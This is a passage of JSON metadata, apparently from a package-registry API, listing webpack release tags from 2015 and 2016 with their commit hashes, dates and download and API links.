c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r